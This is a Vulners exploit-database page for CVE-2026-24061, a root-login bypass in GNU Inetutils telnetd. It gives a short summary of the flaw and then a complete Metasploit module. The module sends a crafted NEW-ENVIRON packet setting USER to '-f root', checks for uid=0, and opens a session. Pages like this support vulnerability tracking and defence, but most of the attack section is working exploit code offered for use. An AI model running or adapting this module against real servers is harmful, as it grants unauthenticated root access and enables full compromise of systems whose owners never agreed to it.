Vulners
Lucene search
📄 GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass
| Reporter | Title | Published | Views | Family All 112 |
|---|---|---|---|---|
 | Exploit for CVE-2026-24061 | 26 Jan 202605:05 | – | githubexploit |
| Exploit for CVE-2026-24061 | 26 Jan 202609:58 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 16 Mar 202614:55 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 6 Feb 202617:06 | – | githubexploit |
| Exploit for CVE-2026-24061 | 24 Jan 202613:18 | – | githubexploit |
| Exploit for CVE-2026-24061 | 24 Jan 202614:15 | – | githubexploit |
| telnet-pocs-2026 | 12 May 202609:25 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 3 Mar 202604:31 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 27 Jan 202620:04 | – | githubexploit |
| Exploit for CVE-2026-24061 | 22 Jan 202618:30 | – | githubexploit |
10
=============================================================================================================================================
| # Title : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.gnu.org/software/inetutils/ |
=============================================================================================================================================
[+] Summary : A critical authentication bypass vulnerability has been identified in GNU Inetutils specifically affecting the telnetd service.
The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option. By sending a specially crafted environment variable containing
the value -f root within the USER field, a remote attacker can force the service to invoke the system login process in a way that bypasses password authentication.
Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials.
The vulnerability is tracked as: CVE-2026-24061
Impact
Remote unauthenticated root access
No brute force required
No valid credentials required
Full system compromise possible
Severity
Critical – Pre-Authentication Remote Code Execution / Privilege Escalation
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Telnet
def initialize(info = {})
super(update_info(info,
'Name' => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)',
'Description' => %q{
This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd.
By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable
containing '-f root', an attacker can login as root without a password.
This occurs because telnetd passes the environment variable directly to the
login command without proper sanitization.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2026-24061' ] #
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "",
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 20 2026',
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ IOC_IN_LOGS ]
}
))
register_options(
[
Opt::RPORT(23),
OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ])
])
end
def exploit
connect
print_status("Waiting for server banner and negotiation...")
banner = sock.get_once(-1, 5)
if banner
print_status("Target Banner: #{banner.strip}")
end
packet = "\xff\xfa\x27\x00"
packet << "\x00USER"
packet << "\x01-f #{datastore['USER']}"
packet << "\xff\xf0"
print_status("Sending bypass payload for user: #{datastore['USER']}...")
sock.put(packet)
Rex.sleep(1)
sock.put("id\n")
res = sock.get_once(-1, 5)
if res && res =~ /uid=0/
print_good("Success! Authenticated as root (uid=0).")
handler
else
print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.")
end
rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
print_error("Connection failed.")
ensure
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.91526
SSVC